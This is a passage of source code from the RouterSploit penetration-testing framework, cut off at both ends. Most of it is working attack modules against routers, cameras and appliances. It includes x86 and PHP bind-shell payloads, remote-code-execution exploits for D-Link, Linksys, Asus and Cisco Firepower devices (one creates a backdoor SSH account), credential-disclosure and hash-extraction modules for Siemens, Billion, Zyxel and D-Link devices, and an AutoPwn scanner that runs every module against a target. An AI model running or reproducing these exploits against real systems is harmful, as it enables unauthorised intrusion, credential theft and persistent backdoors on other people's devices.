                d = sys.stdin.read(1)
                if not d:
                    break

                chan.send(d)

        except Exception as err:
            print_error("Error", err, verbose=self.verbosity)

    def close(self) -> bool:
        """ Close SSH connection

        :return bool: True if closing connection was successful, False otherwise
        """

        try:
            self.ssh_client.close()
            return True
        except Exception as err:
            print_error(self.peer, "SSH Error while closing connection", err, verbose=self.verbosity)

        return False


# pylint: disable=no-member
class SSHClient(Exploit):
    """ SSH Client exploit """

    target_protocol = Protocol.SSH

    verbosity = OptBool(True, "Enable verbose output: true/false")

    def ssh_create(self, target: str = None, port: int = None) -> SSHCli:
        """ Create SSH client

        :param str target: target SSH server ip address
        :param int port: target SSH server port
        :return SSHCli: SSH client object
        """

        ssh_target = target if target else self.target
        ssh_port = port if port else self.port

        ssh_client = SSHCli(ssh_target, ssh_port, verbosity=self.verbosity)
        return ssh_client



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
    ArchitectureSpecificPayload,
    Architectures,
    BindTCPPayloadMixin,
)


class Payload(BindTCPPayloadMixin, ArchitectureSpecificPayload):
    __info__ = {
        "name": "X86 Bind TCP",
        "description": "Creates interactive tcp bind shell for X86 architecture.",
        "authors": (
            "Ramon de C Valle",  # metasploit module
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        )
    }

    architecture = Architectures.X86

    def generate(self):
        bind_port = utils.convert_port(self.rport)

        return (
            b"\x31\xdb" +                  # xorl    %ebx,%ebx
            b"\xf7\xe3" +                  # mull    %ebx
            b"\x53" +                      # pushl   %ebx
            b"\x43" +                      # incl    %ebx
            b"\x53" +                      # pushl   %ebx
            b"\x6a\x02" +                  # pushl   $0x02
            b"\x89\xe1" +                  # movl    %esp,%ecx
            b"\xb0\x66" +                  # movb    $0x66,%al
            b"\xcd\x80" +                  # int     $0x80
            b"\x5b" +                      # popl    %ebx
            b"\x5e" +                      # popl    %esi
            b"\x52" +                      # pushl   %edx
            b"\x68\x02\x00" + bind_port +  # pushl   port
            b"\x6a\x10" +                  # pushl   $0x10
            b"\x51" +                      # pushl   %ecx
            b"\x50" +                      # pushl   %eax
            b"\x89\xe1" +                  # movl    %esp,%ecx
            b"\x6a\x66" +                  # pushl   $0x66
            b"\x58" +                      # popl    %eax
            b"\xcd\x80" +                  # int     $0x80
            b"\x89\x41\x04" +              # movl    %eax,0x04(%ecx)
            b"\xb3\x04" +                  # movb    $0x04,%bl
            b"\xb0\x66" +                  # movb    $0x66,%al
            b"\xcd\x80" +                  # int     $0x80
            b"\x43" +                      # incl    %ebx
            b"\xb0\x66" +                  # movb    $0x66,%al
            b"\xcd\x80" +                  # int     $0x80
            b"\x93" +                      # xchgl   %eax,%ebx
            b"\x59" +                      # popl    %ecx
            b"\x6a\x3f" +                  # pushl   $0x3f
            b"\x58" +                      # popl    %eax
            b"\xcd\x80" +                  # int     $0x80
            b"\x49" +                      # decl    %ecx
            b"\x79\xf8" +                  # jns     <bndsockcode+50>
            b"\x68\x2f\x2f\x73\x68" +      # pushl   $0x68732f2f
            b"\x68\x2f\x62\x69\x6e" +      # pushl   $0x6e69622f
            b"\x89\xe3" +                  # movl    %esp,%ebx
            b"\x50" +                      # pushl   %eax
            b"\x53" +                      # pushl   %ebx
            b"\x89\xe1" +                  # movl    %esp,%ecx
            b"\xb0\x0b" +                  # movb    $0x0b,%al
            b"\xcd\x80"                    # int     $0x80
        )



import struct
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link Hedwig CGI RCE",
        "description": "Module exploits buffer overflow vulnerablity in D-Link Hedwig CGI component, "
                       "which leads to remote code execution.",
        "authors": (
            "Austin <github.com/realoriginal>",  # routersploit module
        ),
        "references": (
            "http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
            "http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
            "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt",
            "https://www.exploit-db.com/exploits/27283/",
        ),
        "devices": (
            "D-Link DIR-645 Ver. 1.03",
            "D-Link DIR-300 Ver. 2.14",
            "D-Link DIR-600",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            shell(self, architecture="mipsle", method="echo", location="/tmp",
                  echo_options={"prefix": "\\\\x"}, exec_binary="chmod 777 {0} && {0} && rm {0}")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        cmd = cmd.encode("utf-8")

        libcbase = 0x2aaf8000
        system = 0x000531FF
        calcsystem = 0x000158C8
        callsystem = 0x000159CC
        shellcode = utils.random_text(973).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + system)
        shellcode += utils.random_text(16).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + callsystem)
        shellcode += utils.random_text(12).encode("utf-8")
        shellcode += struct.pack("<I", libcbase + calcsystem)
        shellcode += utils.random_text(16).encode("utf-8")
        shellcode += cmd

        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": b"uid=" + shellcode + b";"
        }

        data = {
            utils.random_text(7): utils.random_text(7)
        }

        response = self.http_request(
            method="POST",
            path="/hedwig.cgi",
            headers=headers,
            data=data,
        )

        if response is None:
            return ""

        return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()

    @mute
    def check(self):
        fingerprint = utils.random_text(10)
        cmd = "echo {}".format(fingerprint)

        response = self.execute(cmd)

        if fingerprint in response:
            return True

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "SIEMENS IP-Camera CCMS2025 Password Disclosure",
        "description": "Module exploits SIEMENS IP-Camera CCMS2025 Password Dislosure vulnerability. If target is vulnerable "
                       "it is possible to read administrative credentials",
        "authors": (
            "Yakir Wizman",  # vulnerability discovery
            "VegetableCat <yes-reply[at]linux.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/40254/",
        ),
        "devices": (
            "SIEMENS IP-Camera CVMS2025-IR",
            "SIEMENS IP-Camera CCMS2025",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def __init__(self):
        self.content = None

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            print_info(self.content)
            print_info("Please login at: {}".format(self.get_target_url(path="/cgi-bin/chklogin.cgi")))
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/cgi-bin/readfile.cgi?query=ADMINID"
        )

        if response and "Adm_ID" in response.text:
            self.content = response.text
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
import gzip
import zlib
from io import StringIO
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DGS-1510 Add User",
        "description": "D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28 and DGS-1510-20 "
                       "Websmart devices with firmware before 1.31.B003 allow attackers to conduct Unauthenticated Information Disclosure "
                       "attacks via unspecified vectors.",
        "authors": (
            "Varang Amin",  # vulnerability discovery
            "Dino Causevic"  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/41662/",
        ),
        "devices": (
            "D-Link DGS-1510-28XMP",
            "D-Link DGS-1510-28X",
            "D-Link DGS-1510-52X",
            "D-Link DGS-1510-52",
            "D-Link DGS-1510-28P",
            "D-Link DGS-1510-28",
            "D-Link DGS-1510-20"
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString('dlinkuser', 'User to add in case that user_add option is used.')
    password = OptString('dlinkpwd1234', 'Password for user in case that user_add option is used.')

    def __init__(self):
        self.response_content = None

    def decompress(self, content, encoding):
        ret = content

        if encoding == 'gzip':
            ret = gzip.GzipFile(fileobj=StringIO(ret)).read()

        elif encoding == 'deflate':
            decompress = zlib.decompressobj(-zlib.MAX_WBITS)
            inflated = decompress.decompress(ret)
            inflated += decompress.flush()
            ret = inflated

        return ret.replace(b"\n", b"")

    def extract_users(self, content):
        m_groups = re.match(b'(.*)UserInfo.=.([^;]*)(.*)', content, re.I | re.M)
        return m_groups

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")

            print_status("Extracting user information...")
            m_groups = self.extract_users(self.response_content)
            if m_groups and m_groups.groups > 2:
                print_table(("User Info", ), (m_groups.group(2), ))
            else:
                # Print something, in case that formats vary over models
                # maybe regex will not work and we don't want to leave
                # users without information
                print_table(("User Info", ), (self.response_content, ))

            print_status("Trying to add new user...")
            data = {
                "action": "0",
                "username": self.username,
                "privilege": "15",
                "type": "0",
                "password": self.password
            }

            headers = {
                "Connection": "keep-alive",
                "Cache-Control": "max-age=0",
                "Origin": "{}:{}/".format(self.target, self.port),
                "Upgrade-Insecure-Requests": "1",
                "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36",
                "Content-Type": "application/x-www-form-urlencoded",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                "Referer": "{}:{}/www/login.html".format(self.target, self.port),
                "Accept-Encoding": "gzip, deflate",
                "Accept-Language": "en-US,en;q=0.8"
            }

            response = self.http_request(
                method="POST",
                path="/form/User_Accounts_Apply",
                headers=headers,
                data=data
            )

            if response is not None:
                print_success("Exploit success - new user added: {} / {}".format(self.username, self.password))
            else:
                print_error("Exploid failed - user could not be added")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        self.response_content = None

        headers = {
            "Connection": "keep-alive",
            "Accept": "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
            "X-Requested-With": "XMLHttpRequest",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36",
            "Referer": "{}:{}/www/login.html".format(self.target, self.port),
            "Accept-Encoding": "gzip, deflate, sdch",
            "Accept-Language": "en-US,en;q=0.8",
            "Cookie": "Language=en"
        }

        response = self.http_request(
            method="GET",
            path="/DataStore/990_user_account.js?index=0&pagesize=10",
            headers=headers
        )

        if response is not None and response.status_code == 200:
            self.response_content = self.decompress(response.content,
                                                    response.headers.get('content-encoding', None))

            m_groups = self.extract_users(self.response_content)
            if m_groups:
                return True  # target is vulnerable

        return False  # target is not vulnerable



import re
import base64
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Billion 7700NR4 Password Disclosure",
        "description": "Exploits Billion 7700NR4 password disclosure vulnerability that allows to "
                       "fetch credentials for admin account.",
        "authors": (
            "R-73eN",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/40472/",
        ),
        "devices": (
            "Billion 7700NR4",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def_user = OptString("user", "Hardcoded username")
    def_pass = OptString("user", "Hardcoded password")

    def run(self):
        creds = []
        response = self.http_request(
            method="GET",
            path="/backupsettings.conf",
            auth=(self.def_user, self.def_pass)
        )
        if response is None:
            print_error("Exploit failed")
            return

        res = re.findall('<AdminPassword>(.+?)</AdminPassword>', response.text)

        if len(res):
            print_success("Found strings: {}".format(res[0]))

            try:
                print_status("Trying to base64 decode")
                password = base64.b64decode(res[0])
            except Exception:
                print_error("Exploit failed - could not decode password")
                return

            creds.append(("admin", password))

            print_success("Credentials found!")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Credentials could not be found")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/backupsettings.conf",
            auth=(self.def_user, self.def_pass),
        )
        if response is None:
            return False  # target is not vulnerable

        res = re.findall('<AdminPassword>(.+?)</AdminPassword>', response.text)

        if len(res):
            return True  # target is vulnerable

        return False  # target not vulnerable



import os

from routersploit.core.exploit import *
from routersploit.core.exploit.exploit import Protocol


class Exploit(Exploit):
    __info__ = {
        "name": "AutoPwn",
        "description": "Module scans for all vulnerabilities and weaknesses.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "devices": (
            "Multi",
        ),
    }

    modules = ["generic", "routers", "cameras", "misc"]

    target = OptIP("", "Target IPv4 or IPv6 address")

    vendor = OptString("any", "Vendor concerned (default: any)")

    check_exploits = OptBool(True, "Check exploits against target: true/false", advanced=True)
    check_creds = OptBool(True, "Check factory credentials against target: true/false", advanced=True)

    http_use = OptBool(True, "Check HTTP[s] service: true/false")
    http_port = OptPort(80, "Target Web Interface Port", advanced=True)
    http_ssl = OptBool(False, "HTTPS enabled: true/false")

    ftp_use = OptBool(True, "Check FTP[s] service: true/false")
    ftp_port = OptPort(21, "Target FTP port (default: 21)", advanced=True)
    ftp_ssl = OptBool(False, "FTPS enabled: true/false")

    ssh_use = OptBool(True, "Check SSH service: true/false")
    ssh_port = OptPort(22, "Target SSH port (default: 22)", advanced=True)

    telnet_use = OptBool(True, "Check Telnet service: true/false")
    telnet_port = OptPort(23, "Target Telnet port (default: 23)", advanced=True)

    snmp_use = OptBool(True, "Check SNMP service: true/false")
    snmp_community = OptString("public", "Target SNMP community name (default: public)", advanced=True)
    snmp_port = OptPort(161, "Target SNMP port (default: 161)", advanced=True)

    tcp_use = OptBool(True, "Check custom TCP services", advanced=True)
    # tcp_port = OptPort(None, "Restrict TCP custom service tests to specific port (default: None)")

    udp_use = OptBool(True, "Check custom UDP services", advanced=True)
    # udp_port = OptPort(None, "Restrict UDP custom service tests to specific port (default: None)")

    threads = OptInteger(8, "Number of threads")

    def __init__(self):
        self.vulnerabilities = []
        self.creds = []
        self.not_verified = []
        self._exploits_directories = [os.path.join(utils.MODULES_DIR, "exploits", module) for module in self.modules]
        self._creds_directories = [os.path.join(utils.MODULES_DIR, "creds", module) for module in self.modules]

    def run(self):
        self.vulnerabilities = []
        self.creds = []
        self.not_verified = []

        # Update list of directories with specific vendor if needed
        if self.vendor != 'any':
            self._exploits_directories = [os.path.join(utils.MODULES_DIR, "exploits", module, self.vendor) for module in self.modules]

        if self.check_exploits:
            # vulnerabilities
            print_info()
            print_info("\033[94m[*]\033[0m", "{} Starting vulnerablity check...".format(self.target))

            modules = []
            for directory in self._exploits_directories:
                for module in utils.iter_modules(directory):
                    modules.append(module)

            data = LockedIterator(modules)
            self.run_threads(self.threads, self.exploits_target_function, data)

        if self.check_creds:
            # default creds
            print_info()
            print_info("\033[94m[*]\033[0m", "{} Starting default credentials check...".format(self.target))
            modules = []
            for directory in self._creds_directories:
                for module in utils.iter_modules(directory):
                    modules.append(module)

            data = LockedIterator(modules)
            self.run_threads(self.threads, self.creds_target_function, data)

        # results:
        print_info()
        if self.not_verified:
            print_info("\033[94m[*]\033[0m", "{} Could not verify exploitability:".format(self.target))
            for v in self.not_verified:
                print_info(" - {}:{} {} {}".format(*v))
            print_info()

        if self.vulnerabilities:
            print_info("\033[92m[+]\033[0m", "{} Device is vulnerable:".format(self.target))
            headers = ("Target", "Port", "Service", "Exploit")
            print_table(headers, *self.vulnerabilities)
            print_info()
        else:
            print_info("\033[91m[-]\033[0m", "{} Could not confirm any vulnerablity\n".format(self.target))

        if self.creds:
            print_info("\033[92m[+]\033[0m", "{} Found default credentials:".format(self.target))
            headers = ("Target", "Port", "Service", "Username", "Password")
            print_table(headers, *self.creds)
            print_info()
        else:
            print_info("\033[91m[-]\033[0m", "{} Could not find default credentials".format(self.target))

    def exploits_target_function(self, running, data):
        while running.is_set():
            try:
                module = data.next()
                exploit = module()
            except StopIteration:
                break
            else:
                exploit.target = self.target

                # Avoid checking specific protocol - reduce network impact
                if exploit.target_protocol == Protocol.HTTP:
                    if not self.http_use:
                        continue
                    exploit.port = self.http_port
                    if self.http_ssl:
                        exploit.ssl = "true"
                        exploit.target_protocol = Protocol.HTTPS

                elif exploit.target_protocol is Protocol.FTP:
                    if not self.ftp_use:
                        continue
                    exploit.port = self.ftp_port
                    if self.ftp_ssl:
                        exploit.ssl = "true"
                        exploit.target_protocol = Protocol.FTPS

                elif exploit.target_protocol is Protocol.TELNET:
                    if not self.telnet_use:
                        continue
                    exploit.port = self.telnet_port

                elif exploit.target_protocol is Protocol.SSH:
                    if not self.ssh_use:
                        continue
                    exploit.port = self.ssh_port

                elif exploit.target_protocol is Protocol.SNMP:
                    if not self.snmp_use:
                        continue
                    exploit.port = self.ssh_port

                elif exploit.target_protocol is Protocol.TCP:
                    if not self.tcp_use:
                        continue

                elif exploit.target_protocol is Protocol.UDP:
                    if not self.udp_use:
                        continue

        #        elif exploit.target_protocol not in ["tcp", "udp"]:
        #            exploit.target_protocol = "custom"

                response = exploit.check()

                if response is True:
                    print_info("\033[92m[+]\033[0m", "{}:{} {} {} is vulnerable".format(
                               exploit.target, exploit.port, exploit.target_protocol, exploit))
                    self.vulnerabilities.append((exploit.target, exploit.port, exploit.target_protocol, str(exploit)))
                elif response is False:
                    print_info("\033[91m[-]\033[0m", "{}:{} {} {} is not vulnerable".format(
                               exploit.target, exploit.port, exploit.target_protocol, exploit))
                else:
                    print_info("\033[94m[*]\033[0m", "{}:{} {} {} Could not be verified".format(
                               exploit.target, exploit.port, exploit.target_protocol, exploit))
                    self.not_verified.append((exploit.target, exploit.port, exploit.target_protocol, str(exploit)))

    def creds_target_function(self, running, data):
        while running.is_set():
            try:
                module = data.next()
                exploit = module()

                generic = False
                if exploit.__module__.startswith("routersploit.modules.creds.generic"):
                    if exploit.__module__.endswith("default"):
                        generic = True
                    else:
                        continue

            except StopIteration:
                break
            else:
                exploit.target = self.target
                exploit.verbosity = "false"
                exploit.stop_on_success = "false"
                exploit.threads = self.threads

                if exploit.target_protocol == Protocol.HTTP:
                    exploit.port = self.http_port
                    if self.http_ssl:
                        exploit.ssl = "true"
                        exploit.target_protocol = Protocol.HTTPS

                elif generic:
                    if exploit.target_protocol is Protocol.HTTP:
                        exploit.port = self.http_port
                        if self.http_ssl:
                            exploit.ssl = "true"
                            exploit.target_protocol = Protocol.HTTPS
                    elif exploit.target_protocol == Protocol.SSH:
                        exploit.port = self.ssh_port
                    elif exploit.target_protocol == Protocol.FTP:
                        exploit.port = self.ftp_port
                        if self.ftp_ssl:
                            exploit.ssl = "true"
                            exploit.target_protocol = Protocol.FTPS

                    elif exploit.target_protocol == Protocol.TELNET:
                        exploit.port = self.telnet_port
                else:
                    continue

                response = exploit.check_default()
                if response:
                    print_info("\033[92m[+]\033[0m", "{}:{} {} {} is vulnerable".format(
                               exploit.target, exploit.port, exploit.target_protocol, exploit))

                    for creds in response:
                        self.creds.append(creds)
                else:
                    print_info("\033[91m[-]\033[0m", "{}:{} {} {} is not vulnerable".format(
                               exploit.target, exploit.port, exploit.target_protocol, exploit))



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Zyxel ZyWALL USG Extract Hashes",
        "description": "Exploit implementation for ZyWall USG 20 Authentication Bypass In Configuration Import/Export. "
                       "If the tharget is vulnerable it allows to download configuration files which contains "
                       "sensitive data like password hashes, firewall rules and other network related configurations.",
        "authors": (
            "RedTeam Pentesting",  # vulnerability discovery
        ),
        "references": (
            "https://www.exploit-db.com/exploits/17244/",
        ),
        "devices": (
            "ZyXEL ZyWALL USG-20",
            "ZyXEL ZyWALL USG-20W",
            "ZyXEL ZyWALL USG-50",
            "ZyXEL ZyWALL USG-100",
            "ZyXEL ZyWALL USG-200",
            "ZyXEL ZyWALL USG-300",
            "ZyXEL ZyWALL USG-1000",
            "ZyXEL ZyWALL USG-1050",
            "ZyXEL ZyWALL USG-2000",
        ),
    }
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(443, "Target HTTP port")
    ssl = OptBool(True, "SSL enabled: true/false")

    def __init__(self):
        self.credentials = []

    def run(self):
        self.credentials = []

        if self.check():
            print_success("Target appears to be vulnerable")
            print_table(("Username", "Hash", "User type"), *self.credentials)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):  # todo: requires improvement
        path = "/cgi-bin/export-cgi/images/?category={}&arg0={}".format('config', 'startup-config.conf')
        response = self.http_request(
            method="GET",
            path=path
        )

        if response is not None and response.status_code == 200:
            for line in response.text.split("\n"):
                line = line.strip()
                m_groups = re.match(r"username (.*) password (.*) user-type (.*)", line, re.I | re.M)
                if m_groups:
                    self.credentials.append((m_groups.group(1), m_groups.group(2), m_groups.group(3)))

            if self.credentials:
                return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Linksys E1500/E2500",
        "description": "Module exploits remote command execution in Linksys E1500/E2500 devices. "
                       "Diagnostics interface allows executing root privileged shell commands is "
                       "available on dedicated web pages on the device.",
        "authors": (
            "Michael Messner",  # vulnerability discovery
            "Esteban Rodriguez (n00py)",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/24475/",
        ),
        "devices": (
            "Linksys E1500/E2500",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString("admin", "Username to login with")
    password = OptString("admin", "Password to login with")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection - response is not available")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        data = {
            "submit_button": "Diagnostics",
            "change_action": "gozila_cgi",
            "submit_type": "start_ping",
            "action": "",
            "commit": "0",
            "ping_ip": "127.0.0.1",
            "ping_size": "&" + cmd,
            "ping_times": "5",
            "traceroute_ip": "127.0.0.1"
        }

        self.http_request(
            method="POST",
            path="/apply.cgi",
            data=data,
            auth=(self.username, self.password)
        )

        return ""

    @mute
    def check(self):
        mark = utils.random_text(32)
        cmd = "echo {}".format(mark)
        data = {
            "submit_button":
            "Diagnostics",
            "change_action": "gozila_cgi",
            "submit_type": "start_ping",
            "action": "",
            "commit": "0",
            "ping_ip": "127.0.0.1",
            "ping_size": "&" + cmd,
            "ping_times": "5",
            "traceroute_ip": "127.0.0.1"
        }

        response = self.http_request(
            method="POST",
            path="/apply.cgi",
            data=data,
            auth=(self.username, self.password)
        )
        if response is None:
            return False  # target is not vulnerable

        if mark in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import requests
import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.core.ssh.ssh_client import SSHClient


class Exploit(HTTPClient, SSHClient):
    __info__ = {
        "name": "Cisco Firepower Management 6.0 RCE",
        "description": "Module exploits Cisco Firepower Management 6.0 Remote Code Execution vulnerability. "
                       "If the target is vulnerable, it is create backdoor account and authenticate through SSH service.",
        "authors": (
            "Matt",  # vulnerability discovery
            "sinn3r",  # metasploit module
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6433",
            "https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking",
        ),
        "devices": (
            "Cisco Firepower Management Console 6.0",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(443, "Target HTTP port")
    ssl = OptBool(True, "SSL enabled: true/false")

    ssh_port = OptPort(22, "Target SSH Port")

    username = OptString("admin", "Default username to log in")
    password = OptString("Admin123", "Default password to log in")

    newusername = OptString("", "New backdoor username (Default: Random)")
    newpassword = OptString("", "New backdoor password (Default: Random)")

    def __init__(self):
        self.session = None

    def run(self):
        self.session = requests.Session()

        if self.check():
            print_success("Target seems to be vulnerable")
            if self.login():
                if not self.newusername:
                    self.newusername = utils.random_text(8)
                if not self.newpassword:
                    self.newpassword = utils.random_text(8)

                self.create_ssh_backdoor(self.newusername, self.newpassword)

                # Log into the SSH backdoor account
                self.init_ssh_session(self.newusername, self.newpassword)
            else:
                print_error("Exploit failed. Could not log in")
        else:
            print_error("Exploit failed. Target seems to be not vulnerable.")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/img/favicon.png?v=6.0.1-1213",
        )

        if response is not None and response.status_code == 200:
            ssh_client = self.ssh_create(port=self.ssh_port)
            if ssh_client.test_connect():
                return True  # target is vulnerable

        return False  # target is not vulnerable

    def login(self):
        data = {
            "username": self.username,
            "password": self.password,
            "target": ""
        }

        print_status("Trying to authenticate")
        response = self.http_request(
            method="POST",
            path="/login.cgi?logout=1",
            data=data,
            allow_redirects=False,
            session=self.session,
        )

        if response is None:
            return False

        if response.status_code == 302 and "CGISESSID" in response.cookies.keys():
            print_status("CGI Session ID: {}".format(response.cookies['CGISESSID']))
            print_success("Authenticated as {}:{}".format(self.username, self.password))
            return True

        print_error("Exploit failed. Could not authenticate.")
        return False

    def create_ssh_backdoor(self, username, password):
        sh_name = 'exploit.sh'
        sf_action_id = self.get_sf_action_id()

        payload = "sudo useradd -g ldapgroup -p `openssl passwd -1 {}` {}; rm /var/sf/SRU/{}".format(password, username, sh_name)

        print_status("Attempting to create SSH backdoor")

        multipart_form_data = {
            "action_submit": (None, "Import"),
            "source": (None, "file"),
            "manual_update": (None, "1"),
            "sf_action_id": (None, sf_action_id),
            "file": (sh_name, payload)
        }

        self.http_request(
            method="POST",
            path="/DetectionPolicy/rules/rulesimport.cgi",
            files=multipart_form_data,
            session=self.session
        )

        return

    def get_sf_action_id(self):
        print_status("Attempting to obtain sf_action_id from rulesimport.cgi")

        response = self.http_request(
            method="GET",
            path="/DetectionPolicy/rules/rulesimport.cgi",
            session=self.session
        )
        if response is None:
            return None

        res = re.findall("sf_action_id = '(.+)';", response.text)

        if len(res) > 1:
            print_status("Found sf_action_id: {}".format(res[1]))
            return res[1]

        return None

    def init_ssh_session(self, username, password):
        print_status("Trying to authenticate through SSH with username: {} password:{} account".format(username, password))
        ssh_client = self.ssh_create()
        if ssh_client.login(username, password):
            print_success("SSH - Successful authentication")
            ssh_client.interactive()



from routersploit.core.exploit.option import OptEncoder
from routersploit.core.exploit.payloads import (
    GenericPayload,
    Architectures,
    BindTCPPayloadMixin,
)
from routersploit.modules.encoders.php.base64 import Encoder


class Payload(BindTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "PHP Bind TCP",
        "description": "Creates interactive tcp bind shell by using php.",
        "authors": (
            "Andre Marques (zc00l)",  # shellpop
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PHP
    encoder = OptEncoder(Encoder(), "Encoder")

    def generate(self):
        return (
            "$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
            "socket_bind($s,\"0.0.0.0\",{});".format(self.rport) +
            "socket_listen($s,1);" +
            "$cl=socket_accept($s);" +
            "while(1){" +
            "if(!socket_write($cl,\"$ \",2))exit;" +
            "$in=socket_read($cl,100);" +
            "$cmd=popen(\"$in\",\"r\");" +
            "while(!feof($cmd)){" +
            "$m=fgetc($cmd);" +
            "socket_write($cl,$m,strlen($m));" +
            "}}"
        )



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Asus B1M Projector RCE",
        "description": "Module exploits Asus B1M Projector Remote Code Execution vulnerability which "
                       "allows executing command on operating system level with root privileges.",
        "authors": (
            "Hacker House <www.myhackerhouse.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.myhackerhouse.com/asus-b1m-projector-remote-root-0day/",
        ),
        "devices": (
            "Asus B1M Projector",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self, architecture="mipsbe")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        path = "/cgi-bin/apply.cgi?ssid=\"%20\"`{}`".format(cmd)

        response = self.http_request(
            method="GET",
            path=path
        )

        if response is None:
            return ""

        return response.text

    @mute
    def check(self):
        cmd = "cat /etc/shadow"
        response_text = self.execute(cmd)

        if utils.detect_file_content(response_text, "/etc/shadow"):
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Brickcom Camera Credentials Disclosure",
        "description": "Exploit implementation for miscellaneous Brickcom cameras with 'users.cgi'."
                       "Allows remote credential disclosure by low-privilege user.",
        "authors": (
            "Emiliano Ipar <@maninoipar>",  # vulnerability discovery
            "Ignacio Agustin Lizaso <@ignacio_lizaso>",  # vulnerability discovery
            "Gaston Emanuel Rivadero <@derlok_epsilon>",  # vulnerability discovery
            "Josh Abraham",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/42588/",
            "https://www.brickcom.com/news/productCERT_security_advisorie.php",
        ),
        "devices": (
            "Brickcom WCB-040Af",
            "Brickcom WCB-100A",
            "Brickcom WCB-100Ae",
            "Brickcom OB-302Np",
            "Brickcom OB-300Af",
            "Brickcom OB-500Af",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def __init__(self):
        self.credentials = (
            ("admin", "admin"),
            ("viewer", "viewer"),
            ("rviewer", "rviewer"),
        )

        self.configuration = None

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")
            print_status("Dumping configuration...")
